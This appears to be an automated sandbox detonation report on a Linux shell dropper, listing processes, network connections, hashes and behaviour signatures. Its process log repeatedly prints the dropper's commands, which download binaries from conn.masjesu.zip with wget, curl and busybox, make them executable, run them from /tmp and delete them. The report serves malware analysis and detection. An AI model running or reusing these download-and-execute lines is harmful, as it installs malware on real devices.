
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj

[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/rm

[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/chmod

[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU

[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/rm

[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/chmod

[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr

[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/rm

[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/chmod

[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya

[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/rm

[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/chmod

[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8

[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/rm

[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/chmod

[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s

[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/rm

[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/chmod

[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T

[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/rm

[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/chmod

[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1

[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/rm

[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/chmod

[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs

[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/rm

[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/chmod

[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z

[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/rm

[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/chmod

[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF

[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/rm

[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/chmod

[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j

[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/rm

[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 02:03

Reported

2024-11-24 02:06

Platform

debian9-mipsel-20240418-en

Max time kernel

77s

Max time network

79s

Command Line

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 N/A
N/A /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs N/A
N/A /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 N/A
N/A /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s N/A
N/A /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T N/A
N/A /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z N/A
N/A /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF N/A
N/A /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j N/A
N/A /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV N/A
N/A /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH N/A
N/A /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj N/A
N/A /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU N/A
N/A /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr N/A
N/A /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya N/A
N/A /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV N/A
N/A /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH N/A
N/A /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj N/A
N/A /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU N/A
N/A /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr N/A
N/A /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya N/A
N/A /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 N/A
N/A /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s N/A
N/A /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T N/A
N/A /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 N/A
N/A /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs N/A
N/A /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z N/A
N/A /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF N/A
N/A /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /usr/bin/curl N/A
File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /usr/bin/curl N/A
File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /usr/bin/curl N/A
File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /usr/bin/curl N/A
File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /usr/bin/curl N/A
File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /usr/bin/curl N/A
File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /usr/bin/curl N/A
File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /usr/bin/curl N/A
File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /usr/bin/curl N/A
File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /usr/bin/curl N/A
File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /usr/bin/curl N/A
File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /usr/bin/curl N/A
File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /usr/bin/curl N/A
File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /usr/bin/curl N/A
File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /usr/bin/curl N/A
File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /usr/bin/curl N/A
File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /usr/bin/curl N/A
File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /usr/bin/curl N/A
